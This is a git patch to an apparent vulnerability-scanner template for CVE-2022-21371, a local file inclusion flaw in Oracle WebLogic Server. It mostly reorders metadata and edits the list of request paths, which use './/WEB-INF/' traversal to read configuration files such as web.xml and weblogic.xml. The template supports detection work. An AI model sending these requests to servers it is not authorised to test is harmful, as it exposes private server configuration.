From 97b38b98b48788b33c5d9e0b16df0e2c5501025d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 25 Jan 2022 21:06:14 +0530 Subject: [PATCH] Update CVE-2022-21371.yaml --- cves/2022/CVE-2022-21371.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml index 09deb75eda..849ebe3f6d 100644 --- a/cves/2022/CVE-2022-21371.yaml +++ b/cves/2022/CVE-2022-21371.yaml @@ -2,23 +2,22 @@ id: CVE-2022-21371 info: name: Oracle WebLogic Server LFI - author: Paradessia and Narluin + author: paradessia,narluin severity: high description: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion - tags: cve,cve2022,lfi,weblogic,oracle reference: + - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371 - - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2022-21371 + tags: cve,cve2022,lfi,weblogic,oracle requests: - method: GET path: - - "{{BaseURL}}.//META-INF/MANIFEST.MF" - "{{BaseURL}}.//WEB-INF/web.xml" - "{{BaseURL}}.//WEB-INF/portlet.xml" - "{{BaseURL}}.//WEB-INF/weblogic.xml" @@ -27,10 +26,10 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body condition: and - type: status